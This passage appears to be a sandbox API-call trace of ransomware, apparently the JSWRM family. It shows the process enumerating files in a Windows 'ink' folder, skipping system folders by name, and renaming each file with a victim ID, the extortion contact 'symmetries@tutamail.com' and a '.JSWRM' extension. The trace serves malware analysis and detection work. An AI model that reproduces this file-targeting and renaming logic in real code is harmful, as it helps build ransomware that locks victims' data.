lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtscom.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.873] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.873] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.873] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.873] CloseHandle (hObject=0xffffffff) returned 1 [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0067.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0067.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.873] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.873] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.874] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da18a06, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2=".") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="..") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="...") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="windows") returned -1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="recovery") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="perflogs") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="documents and settings") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="system volume information") returned -1 [0067.874] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="msocache") returned 1 [0067.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe.mui", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe.mui", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShapeCollector.exe.mui", lpUsedDefaultChar=0x0) returned 22 [0067.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe.mui", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ShapeCollector.exe.mui", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShapeCollector.exe.mui", lpUsedDefaultChar=0x0) returned 22 [0067.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0067.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0067.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.875] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10082418549836968) returned 0 [0067.875] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.875] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.875] CloseHandle (hObject=0xffffffff) returned 1 [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0067.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0067.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0067.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0067.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.876] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2c6cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="split.avi", cAlternateFileName="")) returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2=".") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="..") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="...") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="windows") returned -1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="recovery") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="perflogs") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="documents and settings") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="$RECYCLE.BIN") returned 1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="system volume information") returned -1 [0067.876] lstrcmpiW (lpString1="split.avi", lpString2="msocache") returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0067.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="split.avi", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="split.avi", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="split.avi", lpUsedDefaultChar=0x0) returned 9 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="split.avi", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0067.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="split.avi", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="split.avi", lpUsedDefaultChar=0x0) returned 9 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0067.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.877] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.877] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0067.877] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.877] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.877] CloseHandle (hObject=0xffffffff) returned 1 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0067.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0067.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.877] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\split.avi.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0067.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0067.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0067.878] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2=".") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="..") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="...") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="windows") returned -1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="recovery") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="perflogs") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="documents and settings") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="system volume information") returned 1 [0067.878] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="msocache") returned 1 [0067.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll.mui", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tabskb.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll.mui", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tabskb.dll.mui", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tabskb.dll.mui", lpUsedDefaultChar=0x0) returned 14 [0067.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0067.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.879] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0067.879] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.879] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.879] CloseHandle (hObject=0xffffffff) returned 1 [0067.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0067.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.880] MultiByteToWideChar (in: 